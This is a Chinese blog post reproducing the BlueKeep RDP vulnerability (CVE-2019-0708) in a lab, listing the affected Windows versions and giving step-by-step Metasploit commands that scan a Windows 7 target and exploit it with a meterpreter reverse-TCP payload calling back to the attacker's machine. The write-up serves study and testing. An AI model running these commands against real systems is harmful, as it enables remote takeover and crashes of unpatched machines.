zoukankan      html  css  js  c++  java
  • CVE-2019-0708漏洞复现

    漏洞概述

    远程桌面服务高危远程代码执行漏洞(CVE-2019-0708),老是有系统爆这个漏洞,但是很少能有利用的,今天搭环境来测试以下利用条件。

    涉及系统版本

    Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
    Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
    Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
    Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
    Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
    Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
    Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
    Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

    不涉及系统版本

    windows 10
    windows 8

    漏洞复测

    攻击机:kali2021 IP: 192.168.2.103
    靶机:windows7 IP:192.168.2.109

    1、搜索msf支持的0708模块

    search 0708
    

    2、利用扫描模块探测目标系统是否存在漏洞

    use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    show options
    use rhosts 192.168.2.109 //设置目标
    run
    


    表示目标存在0708漏洞

    3、设置攻击模块参数

    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //设置攻击模块
    show options
    set rhosts 192.168.2.109 //设置目标
    set lhost 192.168.2.103  //设置shell监听IP,监听端口默认即可
    set payload windows/x64/meterpreter/reverse_tcp //设置payload
    

    4、设置攻击模式,最终攻击设置如下图

    show optinos targets //查看攻击模块支持的系统
    set target 1         //设置攻击模块模式1
    show options
    

    5、执行攻击获取meterpreter,看起来一切顺利

    run
    

    6、多运行几次payload,发现计算机蓝屏

    声明

    严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合!

  • 相关阅读:
    做题总结
    关于SQLSERVER中用SQL语句查询的一些个人理解
    关于SQLSERVER联合查询一点看法
    C#中怎样实现序列化和反序列化
    java内部类的使用
    C#抽象类
    匿名类
    Foreach能够循环的本质
    C#索引器
    深入了解接口的使用
  • 原文地址:https://www.cnblogs.com/renhaoblog/p/14785381.html
Copyright © 2011-2022 走看看